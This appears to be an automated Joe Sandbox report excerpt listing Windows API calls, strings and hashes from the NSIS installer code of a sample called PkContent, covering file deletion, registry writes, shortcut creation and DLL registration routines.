                                                  • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                  • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                • String ID: 82D$@%F$@rD$A
                                                • API String ID: 3347642858-1086125096
                                                • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                • CloseHandle.KERNEL32(?), ref: 004071E6
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                • API String ID: 1916479912-1189179171
                                                • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                APIs
                                                • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                • FindClose.KERNEL32(?), ref: 00406E33
                                                Strings
                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                • \*.*, xrefs: 00406D03
                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                • API String ID: 2035342205-3294556389
                                                • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                APIs
                                                • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 3581403547-784952888
                                                • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                APIs
                                                • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                Strings
                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                • API String ID: 542301482-1377821865
                                                • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                • lstrlenW.KERNEL32(?), ref: 004063CC
                                                • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                  • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                • GlobalFree.KERNEL32(?), ref: 004064DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                • GetSysColor.USER32(?), ref: 004041AF
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                • lstrlenW.KERNEL32(?), ref: 004041D6
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                  • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                • SendMessageW.USER32(00000000), ref: 00404251
                                                • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                • SetCursor.USER32(00000000), ref: 004042D2
                                                • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                • SetCursor.USER32(00000000), ref: 004042F6
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                • String ID: @%F$N$open
                                                APIs
                                                • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                • wsprintfA.USER32 ref: 00406B4D
                                                • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                • String ID: F$%s=%s$NUL$[Rename]
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                • EndPaint.USER32(?,?), ref: 00401177
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                APIs
                                                • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                Strings
                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                Strings
                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                • String ID: created uninstaller: %d, "%s"
                                                APIs
                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                • API String ID: 3734993849-2769509956
                                                • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                • GetSysColor.USER32(00000000), ref: 00403E00
                                                • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                • SetBkMode.GDI32(?,?), ref: 00403E18
                                                • GetSysColor.USER32(?), ref: 00403E2B
                                                • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                • DeleteObject.GDI32(?), ref: 00403E55
                                                • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                Strings
                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                • API String ID: 1033533793-945480824
                                                • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
